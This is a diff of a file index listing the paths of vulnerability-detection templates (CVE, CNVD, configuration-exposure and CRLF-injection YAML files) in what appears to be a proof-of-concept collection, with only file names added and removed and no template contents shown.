+./poc/config/api-iconfinder.yaml ./poc/config/aws-config-not-enabled.yaml ./poc/config/aws-s3-misconfig.yaml ./poc/config/awstats-config-1.yaml ./poc/config/awstats-config-2.yaml ./poc/config/awstats-config-655.yaml +./poc/config/awstats-config-656.yaml ./poc/config/azure-pipelines-config-disclosure.yaml ./poc/config/basic-cors-misconfig.yaml ./poc/config/bigip-config-utility-detect-1.yaml ./poc/config/bigip-config-utility-detect-2.yaml ./poc/config/bigip-config-utility-detect-3.yaml ./poc/config/bigip-config-utility-detect-730.yaml +./poc/config/bigip-config-utility-detect-731.yaml +./poc/config/bigip-config-utility-detect-733.yaml ./poc/config/bigip-config-utility-detect.yaml -./poc/config/buffalo-config-injection-798.yaml ./poc/config/buffalo-config-injection-799.yaml -./poc/config/buffalo-config-injection-800.yaml +./poc/config/buffalo-config-injection-801.yaml ./poc/config/buffalo-config-injection.yaml ./poc/config/cache-control-header-misconfiguration.yaml ./poc/config/child-theme-configurator.yaml ./poc/config/chinatelecomequipmentwebconfigurationsystem.yaml ./poc/config/circleci-config-922.yaml -./poc/config/circleci-config-924.yaml ./poc/config/circleci-config-925.yaml ./poc/config/circleci-config.yaml ./poc/config/circleci-ssh-config-926.yaml ./poc/config/circleci-ssh-config-928.yaml ./poc/config/circleci-ssh-config.yaml ./poc/config/cisco-network-config-947.yaml +./poc/config/cisco-network-config-948.yaml ./poc/config/cisco-network-config-949.yaml ./poc/config/cisco-network-config-950.yaml ./poc/config/cisco-network-config-951.yaml @@ -5573,7 +5598,6 @@ ./poc/config/config-js.yaml ./poc/config/config-parameters-yml.yaml ./poc/config/config-properties.yaml -./poc/config/config-rb-1179.yaml ./poc/config/config-rb-1180.yaml ./poc/config/config.php.new.yaml ./poc/config/config.yaml @@ -5582,6 +5606,7 @@ ./poc/config/configurable-tag-cloud-widget-ca276d47d9ec19544f581dbe03805651.yaml ./poc/config/configurable-tag-cloud-widget.yaml ./poc/config/configuration-listing-1181.yaml +./poc/config/configuration-listing-1182.yaml ./poc/config/configuration-listing-1183.yaml ./poc/config/configuration-listing-1184.yaml ./poc/config/configuration-listing-1185.yaml @@ -5611,7 +5636,7 @@ ./poc/config/confluence-detect.yaml ./poc/config/confluence-ssrf-sharelinks-1190.yaml ./poc/config/confluence-ssrf-sharelinks-1191.yaml -./poc/config/confluence-ssrf-sharelinks-1193.yaml +./poc/config/confluence-ssrf-sharelinks-1192.yaml ./poc/config/confluence-ssrf-sharelinks-1194.yaml ./poc/config/confluence-workflow-1195.yaml ./poc/config/confluence-workflow.yaml @@ -5622,7 +5647,7 @@ ./poc/config/coop-misconfig.yaml ./poc/config/coremail-config-disclosure-1213.yaml ./poc/config/coremail-config-disclosure-1214.yaml -./poc/config/coremail-config-disclosure-1215.yaml +./poc/config/coremail-config-disclosure-1216.yaml ./poc/config/coremail-config-disclosure.yaml ./poc/config/cors-misconfig-1222.yaml ./poc/config/cors-misconfig-1223.yaml @@ -5644,13 +5669,14 @@ ./poc/config/docker-compose-config-7.yaml ./poc/config/docker-compose-config-7057.yaml ./poc/config/docker-compose-config-7058.yaml +./poc/config/docker-compose-config-7059.yaml ./poc/config/docker-compose-config-7060.yaml ./poc/config/docker-compose-config.yml ./poc/config/docker-misconfigured-api.yaml ./poc/config/dockercfg-config-1.yaml ./poc/config/dockercfg-config-2.yaml ./poc/config/dockercfg-config-7055.yaml -./poc/config/dockercfg-config.yaml +./poc/config/dockercfg-config-7056.yaml ./poc/config/dockerrun-aws-config-page.yaml ./poc/config/dompdf-config.yaml ./poc/config/drupal_module-config_pages-information-disclosure.yaml @@ -5666,6 +5692,7 @@ ./poc/config/esmtprc-config-7257.yaml ./poc/config/esmtprc-config-7258.yaml ./poc/config/esmtprc-config-7259.yaml +./poc/config/esmtprc-config-7260.yaml ./poc/config/exposed-gitlab-ci-config.yaml ./poc/config/extreme-netconfig-ui-7371.yaml ./poc/config/extreme-netconfig-ui.yaml @@ -5676,9 +5703,10 @@ ./poc/config/find-wp-config-backup.yaml ./poc/config/firebase-config-exposure-1.yaml ./poc/config/firebase-config-exposure-2.yaml -./poc/config/firebase-config-exposure-7485.yaml ./poc/config/firebase-config-exposure-7486.yaml +./poc/config/firebase-config-exposure-7487.yaml ./poc/config/firebase-config-exposure-7488.yaml +./poc/config/firebase-config-exposure.yaml ./poc/config/firebase-config-file.yaml ./poc/config/firebase-config.yaml ./poc/config/fps-config.yaml @@ -5689,14 +5717,14 @@ ./poc/config/front-page-misconfig-7547.yaml ./poc/config/front-page-misconfig-7550.yaml ./poc/config/front-page-misconfig.yaml -./poc/config/ftpconfig-7565.yaml ./poc/config/ftpconfig-7566.yaml +./poc/config/ftpconfig.yaml ./poc/config/gcs-misconfig.yaml -./poc/config/git-config-7633.yaml ./poc/config/git-config-7634.yaml ./poc/config/git-config-7635.yaml ./poc/config/git-config-7636.yaml ./poc/config/git-config-7637.yaml +./poc/config/git-config-7638.yaml ./poc/config/git-config-crendentials.yaml ./poc/config/git-config-exposure.yaml ./poc/config/git-config-nginxoffbyslash-1.yaml @@ -5706,6 +5734,7 @@ ./poc/config/git-config-nginxoffbyslash-5.yaml ./poc/config/git-config-nginxoffbyslash-6.yaml ./poc/config/git-config-nginxoffbyslash-7.yaml +./poc/config/git-config-nginxoffbyslash-7628.yaml ./poc/config/git-config-nginxoffbyslash-7629.yaml ./poc/config/git-config-nginxoffbyslash-7630.yaml ./poc/config/git-config-nginxoffbyslash-7631.yaml @@ -5716,11 +5745,10 @@ ./poc/config/git-config.yaml ./poc/config/github-page-config-7655.yaml ./poc/config/github-page-config-7656.yaml -./poc/config/github-page-config.yaml ./poc/config/gitlab-config-exposure.yml ./poc/config/glpi-fusioninventory-misconfig.yaml -./poc/config/gocd-cruise-configuration-7746.yaml ./poc/config/gocd-cruise-configuration-7747.yaml +./poc/config/gocd-cruise-configuration-7748.yaml ./poc/config/gocd-cruise-configuration.yaml ./poc/config/grafana-exposed-configuration.yaml ./poc/config/grandstream-device-configuration.yaml @@ -5732,12 +5760,11 @@ ./poc/config/heuristic-scanning-not-configured.yaml ./poc/config/hikvision-camera-bypass-configuration-file-download.yaml ./poc/config/honeywell-scada-config-7989.yaml +./poc/config/honeywell-scada-config-7990.yaml ./poc/config/honeywell-scada-config-7991.yaml ./poc/config/honeywell-scada-config-7992.yaml -./poc/config/honeywell-scada-config.yaml ./poc/config/htaccess-config-8042.yaml ./poc/config/htaccess-config-8043.yaml -./poc/config/htaccess-config-8044.yaml ./poc/config/htaccess-config.yaml ./poc/config/httpd-config-8054.yaml ./poc/config/httpd-config.yaml @@ -5749,15 +5776,17 @@ ./poc/config/ispconfig.yaml ./poc/config/joomla-config-dist-file.yaml ./poc/config/joomla-config-file-8374.yaml -./poc/config/joomla-config-file-8375.yaml +./poc/config/joomla-config-file-8376.yaml ./poc/config/joomla-config-file-8377.yaml +./poc/config/joomla-config-file.yaml ./poc/config/joomla-sensitive-config.yaml ./poc/config/jsconfig-json.yaml ./poc/config/kafka-misconfig.yaml ./poc/config/keycloak-openid-config-1.yaml ./poc/config/keycloak-openid-config-2.yaml -./poc/config/keycloak-openid-config-8476.yaml +./poc/config/keycloak-openid-config-8475.yaml ./poc/config/keycloak-openid-config-8477.yaml +./poc/config/keycloak-openid-config.yaml ./poc/config/login-configurator-14616c5034dd1ddef5b9442340e35c8b.yaml ./poc/config/login-configurator-aeebbaa9f5df299f369d13242d94e3a5.yaml ./poc/config/login-configurator-fe19785cecc9ded62fb9e19ffd55d7fb.yaml @@ -5767,8 +5796,8 @@ ./poc/config/magento-config-2.yaml ./poc/config/magento-config-8700.yaml ./poc/config/magento-config-8701.yaml +./poc/config/magento-config-8702.yaml ./poc/config/magento-config-8703.yaml -./poc/config/magento-config-disclosure.yaml ./poc/config/magento-config.yaml ./poc/config/manageengine-network-config.yaml ./poc/config/misconfig.yaml @@ -5784,10 +5813,9 @@ ./poc/config/nexus-repository-exposed-configuration.yaml ./poc/config/nginx-conf-exposed.yaml ./poc/config/nginx-config-9096.yaml -./poc/config/nginx-config-9098.yaml +./poc/config/nginx-config-9097.yaml ./poc/config/nginx-config-9099.yaml ./poc/config/nginx-config-exposure.yaml -./poc/config/nginx-config.yaml ./poc/config/nginx_Misconfiguration.yaml ./poc/config/nuclei_esConfig.yaml ./poc/config/om-video-conferencing.yaml @@ -5797,28 +5825,26 @@ ./poc/config/openssh-sshd-config-disclosure.yaml ./poc/config/oracle-ebs-config-disclosure.yaml ./poc/config/owncloud-config-9419.yaml -./poc/config/owncloud-config.yaml +./poc/config/owncloud-config-9420.yaml ./poc/config/parameters-config-9465.yaml ./poc/config/phinx-config.yaml ./poc/config/php-fpm-config-9513.yaml -./poc/config/php-fpm-config.yaml +./poc/config/php-fpm-config-9514.yaml ./poc/config/pipeline-config-exposure.yaml ./poc/config/poc-yaml-Confluence-ognl-rce.yaml ./poc/config/proftpd-config-9666.yaml -./poc/config/proftpd-config.yaml +./poc/config/proftpd-config-9667.yaml +./poc/config/prometheus-config-9673.yaml ./poc/config/prometheus-config-endpoint-9671.yaml ./poc/config/prometheus-config-endpoint-9672.yaml ./poc/config/prometheus-config-endpoint.yaml -./poc/config/prometheus-config.yaml ./poc/config/publish-confirm-message-be37091b7b8e5fc7583cd9ff3bba3042.yaml ./poc/config/publish-confirm-message.yaml ./poc/config/rabbitmq-config-exposure.yml ./poc/config/rails-database-config-9801.yaml -./poc/config/rails-database-config-9802.yaml ./poc/config/rails-database-config-9803.yaml ./poc/config/rails-database-config-9804.yaml ./poc/config/rconfig-cve-2019-16663.yml -./poc/config/rconfig-rce-9834.yaml ./poc/config/rconfig-rce-9835.yaml ./poc/config/rconfig-rce-9836.yaml ./poc/config/rconfig-rce.yaml @@ -5834,7 +5860,6 @@ ./poc/config/saltstack-config-panel.yaml ./poc/config/samba-config-9985.yaml ./poc/config/samba-config-9986.yaml -./poc/config/samba-config.yaml ./poc/config/seeyon-a6-config-disclosure.yaml ./poc/config/server-config-exposure.yaml ./poc/config/sftp-config-exposure.yaml @@ -5845,28 +5870,27 @@ ./poc/config/springboot-autoconfig-1.yaml ./poc/config/springboot-autoconfig-10437.yaml ./poc/config/springboot-autoconfig-2.yaml -./poc/config/springboot-autoconfig.yaml ./poc/config/springboot-configprops-1.yaml ./poc/config/springboot-configprops-10442.yaml -./poc/config/springboot-configprops-10443.yaml +./poc/config/springboot-configprops-10444.yaml ./poc/config/springboot-configprops-10445.yaml ./poc/config/springboot-configprops-2.yaml ./poc/config/sshd-config-disclosure.yaml ./poc/config/ssrf-via-oauth-misconfig-10525.yaml -./poc/config/ssrf-via-oauth-misconfig-10526.yaml ./poc/config/ssrf-via-oauth-misconfig-10527.yaml ./poc/config/svnserve-config-10589.yaml -./poc/config/svnserve-config-10590.yaml +./poc/config/svnserve-config.yaml ./poc/config/symfony-database-config-10614.yaml ./poc/config/symfony-database-config-10615.yaml -./poc/config/symfony-database-config-10616.yaml ./poc/config/symfony-database-config-10617.yaml +./poc/config/symfony-database-config.yaml ./poc/config/symfony-security-config-1.yaml ./poc/config/symfony-security-config-2.yaml ./poc/config/tasmota-config-webui.yaml +./poc/config/tcpconfig-10663.yaml ./poc/config/tcpconfig-10664.yaml -./poc/config/tcpconfig-10665.yaml ./poc/config/tcpconfig-10666.yaml +./poc/config/tcpconfig.yaml ./poc/config/techbridge-cloud-conference.yaml ./poc/config/tenda-w15e-routercfm-cfg-config-leak.yaml ./poc/config/the-conference-22b4ad0345c7f065a84ce9174ab4fe7e.yaml @@ -5875,6 +5899,7 @@ ./poc/config/tugboat-config-exposure-10841.yaml ./poc/config/tugboat-config-exposure-10842.yaml ./poc/config/tugboat-config-exposure-10843.yaml +./poc/config/tugboat-config-exposure-10844.yaml ./poc/config/unconfirmed-abc400f143f0254b15b00169f8369d29.yaml ./poc/config/unconfirmed.yaml ./poc/config/v2-video-conferencing.yaml @@ -5907,8 +5932,7 @@ ./poc/config/videowhisper-video-conference-integration.yaml ./poc/config/wamp-server-configuration-11096.yaml ./poc/config/wamp-server-configuration-11097.yaml -./poc/config/wamp-server-configuration-11098.yaml -./poc/config/wamp-server-configuration-11099.yaml +./poc/config/wamp-server-configuration.yaml ./poc/config/wanhu-ezoffice-teleconferenceservice-xxe.yaml ./poc/config/wanhu-oa-tele-conference-service-xxe.yaml ./poc/config/web-config-11123.yaml @@ -5935,6 +5959,7 @@ ./poc/config/wordpress-accessible-wpconfig-1.yaml ./poc/config/wordpress-accessible-wpconfig-10.yaml ./poc/config/wordpress-accessible-wpconfig-11.yaml +./poc/config/wordpress-accessible-wpconfig-11234.yaml ./poc/config/wordpress-accessible-wpconfig-11235.yaml ./poc/config/wordpress-accessible-wpconfig-11237.yaml ./poc/config/wordpress-accessible-wpconfig-11238.yaml @@ -5970,7 +5995,7 @@ ./poc/config/wp-conference-schedule.yaml ./poc/config/wp-config-file-editor-84106243219572b793cbbcfa1ea1a8b6.yaml ./poc/config/wp-config-file-editor.yaml -./poc/config/wp-config-setup-11427.yaml +./poc/config/wp-config-setup-11428.yaml ./poc/config/wp-config-setup-11429.yaml ./poc/config/wp-config-setup-11430.yaml ./poc/config/wp-config-setup.yaml @@ -5999,8 +6024,8 @@ ./poc/crlf_injection/crlf-1266.yaml ./poc/crlf_injection/crlf-extended.yaml ./poc/crlf_injection/crlf-injection-1.yaml -./poc/crlf_injection/crlf-injection-1260.yaml ./poc/crlf_injection/crlf-injection-1261.yaml +./poc/crlf_injection/crlf-injection-1262.yaml ./poc/crlf_injection/crlf-injection-1263.yaml ./poc/crlf_injection/crlf-injection-1264.yaml ./poc/crlf_injection/crlf-injection-1265.yaml @@ -6018,7 +6043,6 @@ ./poc/crlf_injection/viewlinc-crlf-injection-11011.yaml ./poc/crlf_injection/viewlinc-crlf-injection-11012.yaml ./poc/crlf_injection/viewlinc-crlf-injection-11013.yaml -./poc/crlf_injection/viewlinc-crlf-injection-11014.yaml ./poc/crlf_injection/viewlinc-crlf-injection-11015.yaml ./poc/crlf_injection/viewlinc-crlf-injection.yaml ./poc/cross_site_request_forgery/WBCE CMS 1.6.1 - Open Redirect & CSRF.yaml @@ -6119,6 +6143,7 @@ ./poc/cve/CNVD-2021-15822.yaml ./poc/cve/CNVD-2021-15824.yaml ./poc/cve/CNVD-2021-17369.yaml +./poc/cve/CNVD-2021-28277.yaml ./poc/cve/CNVD-2021-30167-1.yaml ./poc/cve/CNVD-2021-30167-2.yaml ./poc/cve/CNVD-2021-30167.yaml @@ -6142,7 +6167,6 @@ ./poc/cve/CNVD-2023-08743.yaml ./poc/cve/CVE-2000-0114.yaml ./poc/cve/CVE-2001-0537.yaml -./poc/cve/CVE-2001-1473.yaml ./poc/cve/CVE-2002-1131.yaml ./poc/cve/CVE-2003-1598-35d1ba838509380abcf47521aad3fd3f.yaml ./poc/cve/CVE-2003-1598.yaml @@ -12326,6 +12350,7 @@ ./poc/cve/CVE-2019-8943.yaml ./poc/cve/CVE-2019-8982.yaml ./poc/cve/CVE-2019-9041.yaml +./poc/cve/CVE-2019-9082 (copy 2).yaml ./poc/cve/CVE-2019-9082.yaml ./poc/cve/CVE-2019-9168-8538d93dc59d2dac55aa865d48cc9611.yaml ./poc/cve/CVE-2019-9168.yaml @@ -12379,6 +12404,7 @@ ./poc/cve/CVE-2019-9978.yaml ./poc/cve/CVE-2020-0618.yaml ./poc/cve/CVE-2020-0646.yaml +./poc/cve/CVE-2020-10124 (copy 1).yaml ./poc/cve/CVE-2020-10124.yaml ./poc/cve/CVE-2020-10148 (copy 2).yaml ./poc/cve/CVE-2020-10148.yaml @@ -17184,6 +17210,7 @@ ./poc/cve/CVE-2022-0954.yaml ./poc/cve/CVE-2022-0958-0bb29fa3e00b1016f82b9b2bc89dfc05.yaml ./poc/cve/CVE-2022-0958.yaml +./poc/cve/CVE-2022-0963.yaml ./poc/cve/CVE-2022-0968.yaml ./poc/cve/CVE-2022-0969-da6fe3886198f0ffb0108774bc07dab2.yaml ./poc/cve/CVE-2022-0969.yaml @@ -36207,7 +36234,6 @@ ./poc/cve/CheckCVE_2021_21972.yaml ./poc/cve/Confluence_CVE-2022-26134.yaml ./poc/cve/D-Link-rce-CVE-2024-3273.yaml -./poc/cve/RCE-CVE-2021-41773.yaml ./poc/cve/VMware-CVE-2022-22954-RCE.yml ./poc/cve/activemq-cve-2016-3088.yml ./poc/cve/anheng-gateway-rce-cnvd-2023-03898.yaml @@ -36221,6 +36247,7 @@ ./poc/cve/apache-ofbiz-cve-2018-8033-xxe.yml ./poc/cve/apache-ofbiz-cve-2020-9496-xml-deserialization.yml ./poc/cve/apache-solr-log4j-CVE-2021-44228.yaml +./poc/cve/apache-solr-log4j-cve-2021-44228.yaml ./poc/cve/apache-tomcat-cve-2022-34305.yaml ./poc/cve/bash-cve-2014-6271.yml ./poc/cve/cisco-cve-2020-3452-readfile.yml @@ -36231,13 +36258,13 @@ ./poc/cve/cnnvd-200705-315-1035.yaml ./poc/cve/cnvd-2018-13393-1037.yaml ./poc/cve/cnvd-2018-13393-1038.yaml -./poc/cve/cnvd-2019-01348-1040.yaml ./poc/cve/cnvd-2019-01348-1041.yaml +./poc/cve/cnvd-2019-01348-1042.yaml ./poc/cve/cnvd-2019-01348-1043.yaml ./poc/cve/cnvd-2019-01348-1044.yaml ./poc/cve/cnvd-2019-01348-1045.yaml -./poc/cve/cnvd-2019-06255-1046.yaml ./poc/cve/cnvd-2019-06255-1047.yaml +./poc/cve/cnvd-2019-06255-1048.yaml ./poc/cve/cnvd-2019-06255-1049.yaml ./poc/cve/cnvd-2019-06255-1050.yaml ./poc/cve/cnvd-2019-19299-1051.yaml @@ -36246,28 +36273,29 @@ ./poc/cve/cnvd-2020-23735-1055.yaml ./poc/cve/cnvd-2020-23735-1056.yaml ./poc/cve/cnvd-2020-23735-1057.yaml -./poc/cve/cnvd-2020-23735-1059.yaml +./poc/cve/cnvd-2020-23735-1058.yaml +./poc/cve/cnvd-2020-46552-1060.yaml ./poc/cve/cnvd-2020-46552.yaml ./poc/cve/cnvd-2020-56167-1062.yaml ./poc/cve/cnvd-2020-56167-1063.yaml ./poc/cve/cnvd-2020-56167-1064.yaml ./poc/cve/cnvd-2020-62422-1065.yaml ./poc/cve/cnvd-2020-62422-1066.yaml -./poc/cve/cnvd-2020-62422-1067.yaml +./poc/cve/cnvd-2020-62422-1068.yaml ./poc/cve/cnvd-2020-62422-1069.yaml -./poc/cve/cnvd-2020-67113-1070.yaml ./poc/cve/cnvd-2020-67113-1071.yaml ./poc/cve/cnvd-2020-67113-1072.yaml ./poc/cve/cnvd-2020-68596-1073.yaml +./poc/cve/cnvd-2020-68596-1074.yaml ./poc/cve/cnvd-2020-68596-1075.yaml ./poc/cve/cnvd-2020-68596-1076.yaml ./poc/cve/cnvd-2021-01931-1077.yaml -./poc/cve/cnvd-2021-01931-1078.yaml +./poc/cve/cnvd-2021-01931-1079.yaml ./poc/cve/cnvd-2021-09650-1080.yaml ./poc/cve/cnvd-2021-10543-1082.yaml ./poc/cve/cnvd-2021-10543-1083.yaml +./poc/cve/cnvd-2021-10543-1084.yaml ./poc/cve/cnvd-2021-10543-1085.yaml -./poc/cve/cnvd-2021-10543-1086.yaml ./poc/cve/cnvd-2021-14536-1087.yaml ./poc/cve/cnvd-2021-15822-1089.yaml ./poc/cve/cnvd-2021-15822-1090.yaml @@ -36275,16 +36303,14 @@ ./poc/cve/cnvd-2021-15822-1092.yaml ./poc/cve/cnvd-2021-15822-1093.yaml ./poc/cve/cnvd-2021-15822-1094.yaml -./poc/cve/cnvd-2021-15822-1095.yaml ./poc/cve/cnvd-2021-15824-1096.yaml +./poc/cve/cnvd-2021-17369-1098.yaml ./poc/cve/cnvd-2021-17369-1099.yaml ./poc/cve/cnvd-2021-17369-1100.yaml -./poc/cve/cnvd-2021-17369-1101.yaml ./poc/cve/cnvd-2021-17369-1102.yaml ./poc/cve/cnvd-2021-26422-1103.yaml -./poc/cve/cnvd-2021-26422-1104.yaml +./poc/cve/cnvd-2021-28277-1105.yaml ./poc/cve/cnvd-2021-28277-1106.yaml -./poc/cve/cnvd-2021-28277-1107.yaml ./poc/cve/cnvd-2021-30167-1108.yaml ./poc/cve/cnvd-2021-30167-1109.yaml ./poc/cve/cnvd-2021-30167-1111.yaml @@ -36308,10 +36334,11 @@ ./poc/cve/cve-2001-1473-1298.yaml ./poc/cve/cve-2001-1473-1299.yaml ./poc/cve/cve-2001-1473-1300.yaml +./poc/cve/cve-2001-1473.yaml ./poc/cve/cve-2002-1131-1301.yaml ./poc/cve/cve-2002-1131-1302.yaml ./poc/cve/cve-2002-1131-1303.yaml -./poc/cve/cve-2002-1131-1304.yaml +./poc/cve/cve-2004-0519-1305.yaml ./poc/cve/cve-2004-0519-1306.yaml ./poc/cve/cve-2004-0519-1307.yaml ./poc/cve/cve-2004-0519-1308.yaml @@ -36337,6 +36364,7 @@ ./poc/cve/cve-2006-2842-1328.yaml ./poc/cve/cve-2006-2842-1329.yaml ./poc/cve/cve-2006-2842-1330.yaml +./poc/cve/cve-2006-2842-1331.yaml ./poc/cve/cve-2007-0885-1332.yaml ./poc/cve/cve-2007-0885-1333.yaml ./poc/cve/cve-2007-0885-1334.yaml @@ -36348,7 +36376,6 @@ ./poc/cve/cve-2007-4504-1340.yaml ./poc/cve/cve-2007-4504-1341.yaml ./poc/cve/cve-2007-4504-1342.yaml -./poc/cve/cve-2007-4504.yaml ./poc/cve/cve-2007-4556-1343.yaml ./poc/cve/cve-2007-4556-1344.yaml ./poc/cve/cve-2007-4556-1345.yaml @@ -36393,9 +36420,7 @@ ./poc/cve/cve-2008-6080-1383.yaml ./poc/cve/cve-2008-6080-1384.yaml ./poc/cve/cve-2008-6080-1385.yaml -./poc/cve/cve-2008-6080.yaml ./poc/cve/cve-2008-6172-1386.yaml -./poc/cve/cve-2008-6172-1387.yaml ./poc/cve/cve-2008-6172-1388.yaml ./poc/cve/cve-2008-6172-1389.yaml ./poc/cve/cve-2008-6172-1390.yaml @@ -36417,9 +36442,7 @@ ./poc/cve/cve-2009-0545-1405.yaml ./poc/cve/cve-2009-0545-1406.yaml ./poc/cve/cve-2009-0545-1407.yaml -./poc/cve/cve-2009-0545.yaml ./poc/cve/cve-2009-0932-1408.yaml -./poc/cve/cve-2009-0932-1409.yaml ./poc/cve/cve-2009-0932-1410.yaml ./poc/cve/cve-2009-0932-1411.yaml ./poc/cve/cve-2009-0932-1412.yaml @@ -36435,7 +36458,6 @@ ./poc/cve/cve-2009-1496-1422.yaml ./poc/cve/cve-2009-1496-1423.yaml ./poc/cve/cve-2009-1496-1424.yaml -./poc/cve/cve-2009-1496.yaml ./poc/cve/cve-2009-1558-1425.yaml ./poc/cve/cve-2009-1558-1426.yaml ./poc/cve/cve-2009-1558-1427.yaml @@ -36457,7 +36479,6 @@ ./poc/cve/cve-2009-2100-1443.yaml ./poc/cve/cve-2009-2100-1444.yaml ./poc/cve/cve-2009-2100-1445.yaml -./poc/cve/cve-2009-2100-1446.yaml ./poc/cve/cve-2009-2100-1447.yaml ./poc/cve/cve-2009-3053-1448.yaml ./poc/cve/cve-2009-3053-1449.yaml @@ -36465,6 +36486,7 @@ ./poc/cve/cve-2009-3053-1451.yaml ./poc/cve/cve-2009-3053-1452.yaml ./poc/cve/cve-2009-3053-1453.yaml +./poc/cve/cve-2009-3053.yaml ./poc/cve/cve-2009-3318-1454.yaml ./poc/cve/cve-2009-3318-1455.yaml ./poc/cve/cve-2009-3318-1456.yaml @@ -36501,13 +36523,13 @@ ./poc/cve/cve-2010-0157-1488.yaml ./poc/cve/cve-2010-0157-1489.yaml ./poc/cve/cve-2010-0219-1490.yaml +./poc/cve/cve-2010-0219-1491.yaml ./poc/cve/cve-2010-0467-1492.yaml ./poc/cve/cve-2010-0467-1493.yaml ./poc/cve/cve-2010-0467-1494.yaml ./poc/cve/cve-2010-0467-1495.yaml ./poc/cve/cve-2010-0467-1496.yaml ./poc/cve/cve-2010-0696-1497.yaml -./poc/cve/cve-2010-0696-1498.yaml ./poc/cve/cve-2010-0696-1499.yaml ./poc/cve/cve-2010-0696-1500.yaml ./poc/cve/cve-2010-0696-1501.yaml @@ -36520,17 +36542,19 @@ ./poc/cve/cve-2010-0942-1508.yaml ./poc/cve/cve-2010-0942-1509.yaml ./poc/cve/cve-2010-0942-1510.yaml +./poc/cve/cve-2010-0942-1511.yaml +./poc/cve/cve-2010-0942.yaml ./poc/cve/cve-2010-0943-1512.yaml ./poc/cve/cve-2010-0943-1513.yaml ./poc/cve/cve-2010-0943-1514.yaml ./poc/cve/cve-2010-0943-1515.yaml ./poc/cve/cve-2010-0943-1516.yaml ./poc/cve/cve-2010-0943-1517.yaml -./poc/cve/cve-2010-0943.yaml ./poc/cve/cve-2010-0944-1518.yaml ./poc/cve/cve-2010-0944-1519.yaml ./poc/cve/cve-2010-0944-1520.yaml ./poc/cve/cve-2010-0944-1521.yaml +./poc/cve/cve-2010-0972-1522.yaml ./poc/cve/cve-2010-0972-1523.yaml ./poc/cve/cve-2010-0972-1524.yaml ./poc/cve/cve-2010-0972-1525.yaml @@ -36574,6 +36598,7 @@ ./poc/cve/cve-2010-1219-1559.yaml ./poc/cve/cve-2010-1219-1560.yaml ./poc/cve/cve-2010-1219-1561.yaml +./poc/cve/cve-2010-1219.yaml ./poc/cve/cve-2010-1302-1562.yaml ./poc/cve/cve-2010-1302-1563.yaml ./poc/cve/cve-2010-1302-1564.yaml @@ -36599,21 +36624,21 @@ ./poc/cve/cve-2010-1306-1582.yaml ./poc/cve/cve-2010-1306-1583.yaml ./poc/cve/cve-2010-1306-1584.yaml +./poc/cve/cve-2010-1307-1585.yaml ./poc/cve/cve-2010-1307-1586.yaml ./poc/cve/cve-2010-1307-1587.yaml ./poc/cve/cve-2010-1307-1588.yaml ./poc/cve/cve-2010-1307-1589.yaml +./poc/cve/cve-2010-1307.yaml ./poc/cve/cve-2010-1308-1590.yaml ./poc/cve/cve-2010-1308-1591.yaml ./poc/cve/cve-2010-1308-1592.yaml ./poc/cve/cve-2010-1308-1593.yaml -./poc/cve/cve-2010-1308.yaml ./poc/cve/cve-2010-1312-1594.yaml ./poc/cve/cve-2010-1312-1595.yaml ./poc/cve/cve-2010-1312-1596.yaml ./poc/cve/cve-2010-1312-1597.yaml ./poc/cve/cve-2010-1312-1598.yaml -./poc/cve/cve-2010-1312.yaml ./poc/cve/cve-2010-1313-1599.yaml ./poc/cve/cve-2010-1313-1600.yaml ./poc/cve/cve-2010-1313-1601.yaml @@ -36642,13 +36667,10 @@ ./poc/cve/cve-2010-1345-1622.yaml ./poc/cve/cve-2010-1345-1623.yaml ./poc/cve/cve-2010-1345-1624.yaml -./poc/cve/cve-2010-1345.yaml -./poc/cve/cve-2010-1352-1625.yaml ./poc/cve/cve-2010-1352-1626.yaml ./poc/cve/cve-2010-1352-1627.yaml ./poc/cve/cve-2010-1352-1628.yaml ./poc/cve/cve-2010-1352-1629.yaml -./poc/cve/cve-2010-1353-1630.yaml ./poc/cve/cve-2010-1353-1631.yaml ./poc/cve/cve-2010-1353-1632.yaml ./poc/cve/cve-2010-1353-1633.yaml @@ -36666,12 +36688,12 @@ ./poc/cve/cve-2010-1461-1644.yaml ./poc/cve/cve-2010-1461-1645.yaml ./poc/cve/cve-2010-1469-1646.yaml -./poc/cve/cve-2010-1469-1647.yaml ./poc/cve/cve-2010-1469-1648.yaml ./poc/cve/cve-2010-1469-1649.yaml ./poc/cve/cve-2010-1470-1650.yaml ./poc/cve/cve-2010-1470-1651.yaml ./poc/cve/cve-2010-1470-1652.yaml +./poc/cve/cve-2010-1470-1653.yaml ./poc/cve/cve-2010-1470-1654.yaml ./poc/cve/cve-2010-1471-1655.yaml ./poc/cve/cve-2010-1471-1656.yaml @@ -36691,12 +36713,12 @@ ./poc/cve/cve-2010-1474-1671.yaml ./poc/cve/cve-2010-1474-1672.yaml ./poc/cve/cve-2010-1474-1673.yaml -./poc/cve/cve-2010-1474.yaml ./poc/cve/cve-2010-1475-1674.yaml ./poc/cve/cve-2010-1475-1675.yaml ./poc/cve/cve-2010-1475-1676.yaml ./poc/cve/cve-2010-1475-1677.yaml ./poc/cve/cve-2010-1475-1678.yaml +./poc/cve/cve-2010-1475.yaml ./poc/cve/cve-2010-1476-1679.yaml ./poc/cve/cve-2010-1476-1680.yaml ./poc/cve/cve-2010-1476-1681.yaml @@ -36710,12 +36732,12 @@ ./poc/cve/cve-2010-1491-1691.yaml ./poc/cve/cve-2010-1491-1692.yaml ./poc/cve/cve-2010-1491-1693.yaml -./poc/cve/cve-2010-1491.yaml ./poc/cve/cve-2010-1494-1694.yaml ./poc/cve/cve-2010-1494-1695.yaml ./poc/cve/cve-2010-1494-1696.yaml ./poc/cve/cve-2010-1494-1697.yaml ./poc/cve/cve-2010-1494-1698.yaml +./poc/cve/cve-2010-1494.yaml ./poc/cve/cve-2010-1495-1699.yaml ./poc/cve/cve-2010-1495-1700.yaml ./poc/cve/cve-2010-1495-1701.yaml @@ -36730,7 +36752,6 @@ ./poc/cve/cve-2010-1532-1710.yaml ./poc/cve/cve-2010-1532-1711.yaml ./poc/cve/cve-2010-1532-1712.yaml -./poc/cve/cve-2010-1532.yaml ./poc/cve/cve-2010-1533-1713.yaml ./poc/cve/cve-2010-1533-1714.yaml ./poc/cve/cve-2010-1533-1715.yaml @@ -36758,7 +36779,6 @@ ./poc/cve/cve-2010-1601-1736.yaml ./poc/cve/cve-2010-1601-1737.yaml ./poc/cve/cve-2010-1601-1738.yaml -./poc/cve/cve-2010-1601-1739.yaml ./poc/cve/cve-2010-1602-1740.yaml ./poc/cve/cve-2010-1602-1741.yaml ./poc/cve/cve-2010-1602-1742.yaml @@ -36774,14 +36794,18 @@ 